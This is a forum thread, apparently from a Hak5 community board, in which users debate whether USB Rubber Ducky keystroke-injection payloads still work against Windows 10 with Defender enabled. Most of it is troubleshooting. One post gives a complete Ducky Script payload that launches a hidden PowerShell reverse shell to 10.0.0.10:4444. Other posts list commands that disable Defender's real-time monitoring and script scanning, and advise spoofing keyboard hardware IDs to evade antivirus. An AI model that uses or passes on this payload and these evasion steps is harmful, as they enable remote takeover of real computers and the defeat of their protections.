Rubber Ducky outside MR Robot? Any payload is really working on Windows 10 with Defender Active?

[Phoenix75]

Hi to all, I've bought this device for pentesting and learning. I'm quite a newbie about that kind of hardware..but it seems that the actual Windows Defender of 1903 Windows Edition prevent every kind of payload working. Is that true? I've tried quite 50 payloads. With a System with Defender on it not starts at all. I've also flashed the Ducky with Twin Ducky...it seems that is worse..it takes sometimes to analyze the usb and sometimes finds the inject.bin and remove it. All payload with "gmail send" are not working because of authentication, every payload with password grabbing are not working because Nirsoft removed command line text export for security purposes...so this is a useless expensive usb key and nothing more?

Now, my question: It's really possibile outside Mister Robot series using that device in a real environment? Because I've invested about 20 hours on it and i don't find a way to make it really have a real use if the system is protected..but i've spent aout 90$ in my country for buying it.

If somenone has been able to make it works i will be glad to know. 

Thank You.

 

[theUNK0WN]

Some of the payloads will not work due to security patches. This is not a device that you can plug into a computer and magically works just because you saw it in a video ... Obviously, you will have to modify and =/= or create (your own) payloads to bypass Windows Defender. I do not own a ducky, but I do own a bunny, which does work in a real environment (because I craft my own payloads).

[Phoenix75]

Sorry...there must be a kind misunderstanding. I'm telling that if you plug the ducky into a Windows 10 actual environment, this environment doesn't permit the launch of the ininjection file...you're telling me that i've to improve. 🙂 If isn't possible to launch a file from a USB keyboard emulator like Rubber Ducky is the device is useless and how do you right told, good only for demo online and for selling it. The thing that hurt me is that is still sold on Amazon and on the HAK5 site when it's clear that today you can't use it in a real environment. If you tell me that bunny works maybe i can try...but i've doubt that you can bypass a windows machine with an antivirus full modules enabled..have you tried? if not bypass, will turn also that hardware in a useless one.

I'm talking about windows because 95% of pc's of the world are windows based.

Thank you very much anyway for your support, nice to meet you. 

[Bob123]

Guess I need a little more info.  What is the build of your win10 box?  My latest is 17763 and the one I'm on at the moment is 14393.  Both have defender fully updated and I've been testing different inject.bin files on my rubber ducks all day.  One even has the twin duck firmware on it.  Win10 and defender and not blocking or deleting anything.  Could you give a bit more info on your machine?  Or has anyone else run into issues with this as well?  I'll gladly test what I can on my side to see if I can replicate the issues you are having. 

Worse case you could always setup a VM and have it attack the VM and with that you could put any OS you want on there.  But like theUNKNOWN said, you'll have to do some work to get the duck to do what you'd like to do.

[Phoenix75]

Thank you all.

The windows version i'm using is the latest 1903 (build 18362.295) the ducky has installed the 2.1 firmware, also tried with twin ducky 2.1 but has a keyboard bug i've seen so i've used 2.001. With twin ducky the AV inspect immediately the partition and lock the injection file, sometimes it removes it.

I've tried 2 phisical machines and 1 vm. Same behaviour. I still not understand what you guys mean when tell "you've to work on it", if the system lock immediately the usb device when you plug it you can work for years but there's no solution to that...making device a useless peace of plastic. :)

when i go home i try the Unknown script. I'll update you. Thank you for your help.

[Bob123]

Ok so very briefly I tried mine on 1903 and still so far so good.  That was a vm though and I probably didn't give it enough time to fully update itself.  So I'm going to let it run for a bit and make sure everything is fully up to date.  I'll also install it on a fresh system and see if that makes a difference at all.  But you did bring up a very good point and that's firmware on the duck.  Not sure how I can check mine but my ducks are older.  I know back in the day there was a hardware version or something that had to do with the duck's color.  I have a blue one and a green one.  I think I've seen pics where there's red and maybe even black ones as well.  Wouldn't think that would make a difference but maybe it does.  I'll keep digging.  I am glad to see that your experimenting a bit though, using two physical machines and a vm.  Much better than some people just saying it doesn't work it doesn't work.  Awesome that your troubleshooting.  If you wouldn't mind, could you get an older version of Win10 and make a VM out of it?  I'd be curious if you have the same issues or if it starts to work.  One of the VMs I tested yesterday was from: https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

[Phoenix75]

Bob, firstly thank you..I own 35 technical certifications in systems, networks and security...I'm a 6 times MVP and a CEH...before coming here crying i've done somekind like 10 hours of trials. 😂 I'm quite sure that on a 1703 or 1803 Windows distribution is working, but, surely, i can do a try.

If Defender is in down in the system (and there's a different suite like Kaspersky for example) the Ducky runs. BUT if i put on rogue keyboard option in Kaspersky suite you obtain the same behaviour: the payload don't works at all. Now, as you understand, it's clear that i don't want a magic wand for hacking everything, but a simple system with a professional AV is quite mandatory today. When i go to attend at some colleagues speeches about cybersecuirty they're every time showing a magic disposal that putted on is working and cracks magically the host. I was tired to see that...so i tried to buy also a "magic one" but that has only enforced my idea..if a system is right protected, cracking it without a social engineering attack is quite impossibile.

Anyway, sorry for the talk. My duck is quite blue-green inside and black outside. It would be fantastic if you could tell the firmware you've installed..but there are only 3 versions i've found for classic duck and only other 3 for twin duck..all others ar for other purposes.

Thank you for now. I'll update.

 

[Bob123]

If you go to https://ducktoolkit.com/encode

And create a simple payload like the one kdodge has above.  If you download the inject.bin, your system reacts to it and deletes it?

I wish I could have been more helpful but both a physical machine with 1903 and a vm with 1903 didn't seem to mind either of my ducks.  Both were fully updated and I made sure defender had all of the latest definitions.  Is there anything else that could make your machine not like the duck?  Your just using the defender that came with Win10 correct?  When you say you turn defender off and use Kaspersky you also run into issues, does that mean you have two AV's installed on your machine?  If so I wonder if it's Kaspersky the whole time.  Which if that's the case then that's a good thing...Kaspersky is smart enough to not let a computer fall for the duck.

 

[Phoenix75]

Quote

If you go to https://ducktoolkit.com/encode

And create a simple payload like the one kdodge has above.  If you download the inject.bin, your system reacts to it and deletes it?

sometimes yes, sometimes simply not starts.

Quote

When you say you turn defender off and use Kaspersky you also run into issues, does that mean you have two AV's installed on your machine?  

I see that you're a Linux one 🙂 when you install a different AV on a Windows machine, automatically Defender disable itself because the system is happy that there's a new AV installed. It's quite impossibile to uninstall Defender anyway.

Quote

What I suspect is the real problem, after the Win10 boots up, and Kaspersky has that option enabled, he could plug in a plain-old standard 104-key keyboard and the AV will have a temper-tantrum, thinking its a hack tool. At that point no HID injection will work. 

Afterthought:

One thing he could try is to use the exact same VID/PID as the keyboard that is in use on the Win10. Kaspersky might be stupid enough to assume they are the same keyboard and you might just eek by. Or you might also need to alter the other 3 variables that I listed above to also mimic the current Win10 keyboard that's in use.

 

I agree with you. I think that with the right firmware maybe it can works. But finding the right one is not simple, i'll continue trying and update...thank you all.

[Bob123]

So maybe I miss understood something from the beginning.  How I read your problem is you have a Win10 box at 1903 with windows defender (which is built in) and that's it.  Is that not correct?  Did you also have Kaspersky this whole time as well?  I completely understand how AVs work.  Windows wants something so if you have Kaspersky it disables defender.  Likewise if you turn Kaspersky off defender will kick in.  So I guess the main question is did you have Kaspersky installed but disabled the whole time?  Or did you in fact have just a vanilla Win10 at 1903 with just defender?  If so then again I'm curious what makes your box different than mine.  Or your duck different than mine.  Because I setup a brand new box, put win10 1903 with all the updates, all of the defender updates, and I have absolutely no issues with either of my ducks.  I can run a hand full of scripts without issue.  Only thing I had bark at me yesterday was defender didn't like me trying to use minikatz but that was it.  So what could be different?

 

[Phoenix75]

On 8/27/2019 at 3:04 PM, Bob123 said:

So maybe I miss understood something from the beginning.  How I read your problem is you have a Win10 box at 1903 with windows defender (which is built in) and that's it.  Is that not correct?  Did you also have Kaspersky this whole time as well? 

 

Correct. Kasperksy is another try. Ad you told, when you put a different antivirus on Defender goes down and kick in only if you uninstall the third party AV. For completing the issue (and before approaching here...) I've tried to use a 1903 with a different AV also. that because few people use Defender in a business environment. Anyway, my consideration are adressed on that: if a simple Defender can stop the Ducky, what can do a professional AV? The same thing. 🙂 Is there a way for knowing the firmware\release version of the duck and what kind of firmware there's installed? I think same as you: new Ducky are different from older ones..or...you've a firmware on it that bypass all the issue i've...

[Phoenix75]

@kdodge 

Quote

One thing he could try is to use the exact same VID/PID as the keyboard that is in use on the Win10. Kaspersky might be stupid enough to assume they are the same keyboard and you might just eek by. Or you might also need to alter the other 3 variables that I listed above to also mimic the current Win10 keyboard that's in use.

maybe it works...but i don't know anticipately the id of the keyboard...you agree? 🙂 so...if i've every time access before to the platform for showing it that Ducky became just a toy for bathroom..:-) 

[joepangolives]

I have to agree.  I m truly disappointed with the Hak 5 products, support and lack of up to date tutorials.  I just purchased the essentials kit went converted to my currency is over $500 dollars here in NZ.  I have just spent the whole weekend learning to use the Wifi pineapple and the Rubber ducky.   What I have found is that 99% of the payloads dont work, the tutorials are outdated of links are broken and the every time you encounter a problem it leads you to a solution that leads to another problem.

I believe Hak 5 are completely misleading with their sales pitch and need to re-evaluate whether or not they are trading their products with a fair and reasonable expectation from the customer.  Im truly disappointed and would not recommend their products.

[NotSoElite]

What's interesting is the rubbery ducky has been a favorite parlor trick of mine for a few years.. Taking the OSCP I thought I would dust it off and try it to create a c2c back to my son's computer to rick roll him for fun.. And I have the same issue.. Windows Defender keeps detecting it and blocking it once it tries to execute anything. I'm with the original poster.. this was a cool hack, but like the capt crunch whistle.. it might be past its prime now..

[Bob123]

Man I'm really not a fan of reliving the past but someones going to have to tell me what they are doing to their Win10 1903 boxes.  I have a Win10 1903 with defender on by default.  I have a Win10 1903 VM (several) with defender on by default.  Granted when I have a payload with mimikatz or anything defender sees it as questionable and instantly deletes it on me which is a huge pain in the...  But I have never seen windows defender prevent my inject.bin from running.  I'm not even sure how it would see it as it's code execution from within the duck (keyboard)...

So I'd like to help but someone needs to explain what's different from their environment compared to mine.  Unless something physically changed in the ducks.  I have two.  A blue one and a green one.  I know they went through several small changes back in their prime but both of mine work exactly the same. 

Course one other thing to point out.  What are all of you trying to do?  I'd suggest taking a step back and create a payload that opens notepad and says hello.  Can your duck do that?  Start there.  Let me know what you had for results.  Then we can go from there.  I just got a Malduino and it itself comes with nothing.  So first payload was notepad.  They my favorite payload which is to show all of the wifi passwords.  And then I have done more from there.  But all of which were based off the duck and still to this day work on the duck. 

[PanicAcid]

So what are we saying here? Is Windows Defender blocking the hardware ID's of your duckys? 

Windows isn't privy to what your ducky is running, all it knows is that it's a keyboard and that keyboard is pressing keys. The only way it could be actively blocking it is if it's blocked by hardware IDs I believe.

So you guys wanna do a bit of digging and you'll find that it's quite easy to swap this to prevent AV's from identifying this shiny new HID product as a ducky and think it's just a generic keyboard:

Honestly guys, before going off on a tangent about how much you're entitled to some hand holding for buying a product (that requires development from the end user might I add!!) Do a little research.

[H0nd0]

DELAY 1000
GUI r
DELAY 500
STRING cmd
ENTER CTRL-SHIFT
DELAY 500
ALT-y
DELAY 500
STRING powershell -WindowStyle hidden "Set-Execution Policy -Scope CurrentUser -ExecutionPolicy Unrestricted" &&
STRING powershell -WindowStyle hidden -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.10',4444);$stream = $client.GetStream();[byte[]]$bytes = 0...65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
DELAY 500
ENTER

 

[H0nd0]

Sorry about the premature enter 😮

I too am experiencing this same issue, where Windows Defender is deleting certain payloads and blocking certain commands/scripts.

It's important that I point out that I'm using a Malduino and not a Rubber Ducky, the only significant difference being how they are programmed.

After a bit of research, I was able to determine that Windows Defender views certain payloads and/or scripts as malicious; thus, deleting the payload or blocking the script.  I use the above script

You have to disable to Windows Defender and disable script scanning.

Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableScriptScanning $true

There is one other issue to overcome, which I've not been able to so far.  Windows Defender now has a Tamper Protection option, which it appears can only be disabled via the GUI.  I tried to disable it via the registry but get an error.  I can only assume that it can only be disabled via the System.

Hope this sheds a bit more light on the issue.

[Doobiesnackin]

Sorry I am late as well.

I am having the same issue with the Digispark. Same concept though. Much like what H0nd0 said, just disable the firewall and script scanning. Use the

Set ExecutionPolicy to Bypass instead of “unrestricted”. Unrestricted prompts for permission when run (if ran), whilst bypass indicates “nothing is blocked and are no warning prompts”. 

[PanicAcid]

3 minutes ago, Doobiesnackin said:

Sorry I am late as well.

I am having the same issue with the Digispark. Same concept though. Much like what H0nd0 said, just disable the firewall and script scanning. Use the

Set ExecutionPolicy to Bypass instead of “unrestricted”. Unrestricted prompts for permission when run (if ran), whilst bypass indicates “nothing is blocked and are no warning prompts”. 

It's not the same issue as the OP. Basically what the OP is saying is that defender is blocking the ducky / bashbunny by hardware ID, before it even gets chance to do it's thing. 

 

Same will probably be likely of the digispark and other knock-offs, MS will gather a list of hardware IDs and block em.

 

The trick is to change the hardware IDs to something like a real keyboard etc.

 

Also watch out for thread necro lol

[Doobiesnackin]

Naw I agree 100%, mine is working perfectly fine. I can run powershell one liners etc. I was just giving a possibility of why it may not work (Windows defender) rather than MS detecting it’s a malicious device as is. I can’t run Mimi. And shit as my Windows defender blocks that shit. I feels you tho yeah you’re right 💯💯

[Doobiesnackin]

And thread necro 🤔 you mind elaborating?